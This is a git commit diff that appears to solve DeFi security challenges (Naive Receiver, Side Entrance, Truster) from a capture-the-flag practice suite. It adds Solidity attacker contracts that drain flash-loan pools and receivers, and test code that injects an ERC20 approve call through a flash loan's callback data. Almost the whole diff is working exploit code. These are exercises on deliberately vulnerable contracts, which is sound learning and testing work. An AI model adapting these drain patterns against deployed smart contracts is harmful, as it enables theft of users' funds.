feat: theredguild#3 & theredguild#4 solved and attacker-contracts

.gitignore

@@ -1,6 +1,6 @@
 node_modules
 build
-contracts/attacker-contracts/*.sol
+# contracts/attacker-contracts/*.sol
 *.solved.js
 cache
 .openzeppelin

contracts/attacker-contracts/NaiveReceiverAttacker.sol

@@ -0,0 +1,29 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+
+interface IPool {
+    function flashLoan(address borrower, uint256 borrowAmount) external;
+}
+
+contract NaiveReceiverAttacker {
+    address private immutable pool;
+    address private immutable receiver;
+    address private immutable owner;
+
+    constructor(address _pool, address _receiver) payable {
+        pool = _pool;
+        receiver = _receiver;
+        owner = msg.sender;
+    }
+    receive () external payable {}
+
+    function launch(uint256 counter) external {
+        require(msg.sender == owner, "only owner");
+        IPool ipool = IPool(pool);
+        for(uint256 i=0;i<counter;i++){
+            ipool.flashLoan(receiver,1 ether);
+        }
+    }
+
+}

contracts/attacker-contracts/SideEntranceAttacker.sol

@@ -0,0 +1,42 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+import "@openzeppelin/contracts/utils/Address.sol";
+
+interface IFlashLoanEtherReceiver {
+    function execute() external payable;
+}
+
+interface ITargetPool {
+    function flashLoan(uint256 amount) external;
+    function deposit() external payable;
+    function withdraw() external;
+}
+
+contract SideEntranceAttacker is IFlashLoanEtherReceiver {
+    using Address for address payable;
+
+    ITargetPool private immutable pool;
+    address private immutable owner;
+    constructor(address _pool) payable {
+        pool = ITargetPool(_pool);
+        owner = msg.sender;
+    }
+    receive() external payable{}
+
+
+    function attack(uint256 _amount) external {
+        require(msg.sender == owner, "only owner");
+        pool.flashLoan(_amount);
+        // after re-deposit all fund are belonged to this contract
+        pool.withdraw();
+        // send funds to attacker
+        payable(owner).sendValue(_amount);
+    }
+
+
+    function execute() override external payable {
+        require(msg.sender == address(pool), "only pool");
+        // just deposit back to the pool
+        pool.deposit{value:msg.value}();
+    }
+}

test/side-entrance/side-entrance.challenge.js

@@ -25,6 +25,11 @@ describe('[Challenge] Side entrance', function () {
 
     it('Exploit', async function () {
         /** CODE YOUR EXPLOIT HERE */
+        const SideEntranceAttackerCF = await ethers.getContractFactory('SideEntranceAttacker', attacker);
+        this.attackerContract = await SideEntranceAttackerCF.deploy(this.pool.address);
+
+        const tx = await this.attackerContract.attack(ETHER_IN_POOL);
+        await tx.wait();
     });
 
     after(async function () {

test/truster/truster.challenge.js

@@ -29,6 +29,26 @@ describe('[Challenge] Truster', function () {
 
     it('Exploit', async function () {
         /** CODE YOUR EXPLOIT HERE  */
+        // ERC20 approve 
+        const approveSign = 'function approve(address spender, uint256 amount) returns (bool)';
+        const iface = new ethers.utils.Interface([approveSign]);
+        const approveData = iface.encodeFunctionData('approve', [attacker.address, String(TOKENS_IN_POOL)]);
+        // console.log(approveData);
+
+        let tx = await this.pool.connect(attacker).flashLoan(
+            ethers.constants.Zero,
+            attacker.address,
+            this.token.address,
+            approveData
+        );
+        await tx.wait();
+
+        tx = await this.token.connect(attacker).transferFrom(
+            this.pool.address,
+            attacker.address,
+            TOKENS_IN_POOL
+        );
+        await tx.wait();
     });
 
     after(async function () {